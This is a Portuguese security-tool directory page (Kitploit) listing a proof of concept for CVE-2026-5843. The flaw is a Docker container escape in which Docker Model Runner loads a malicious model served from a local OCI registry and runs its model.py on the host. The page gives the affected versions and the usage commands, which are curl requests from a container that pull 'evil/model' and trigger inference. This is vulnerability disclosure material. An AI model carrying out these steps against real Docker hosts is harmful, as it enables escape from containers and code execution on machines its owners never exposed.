Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5843 — POC de escape de contêiner Docker via mlx-metal importlib | Kitploit
Ferramentas/GitHubGitHub/davidrxchester/cve-2026-5843
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoRed TeamingDesenvolvimento de PayloadsEscape de ContêinerSegurança de IA
GitHubdavidrxchester/cve-2026-5843

CVE-2026-5843

POC de escape de contêiner Docker via mlx-metal importlib

Ver Repositório
5há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-5843 PoC

Registro OCI mínimo que serve um modelo malicioso para explorar o caminho de execução importlib de model_file no mlx-lm. Quando o Docker Model Runner carrega o modelo para inferência, model.py executa no host como o usuário logado.

Requer: Docker Desktop ≤ 4.70.x (Apple Silicon) com Model Runner habilitado

Uso

root@kitploit:~
# 1. Start the registry on the host
python3 poc_cve_2026_5843.py

# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh

curl -X POST http://model-runner.docker.internal/api/pull \
  -H 'Content-Type: application/json' \
  -d '{"name":"localhost:5555/evil/model:latest"}'

curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
  -H 'Content-Type: application/json' \
  -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'

A saída é gravada em ~/Desktop/mlx.txt no host.

Análise completa: https://davidrochester.com/posts/container-escape-via-inference

CVEs Relacionados

  • CVE-2026-5817 — vllm-metal trust_remote_code=True, mesma superfície de ataque, corrigido no Docker Desktop 4.68.0
Baixar ferramenta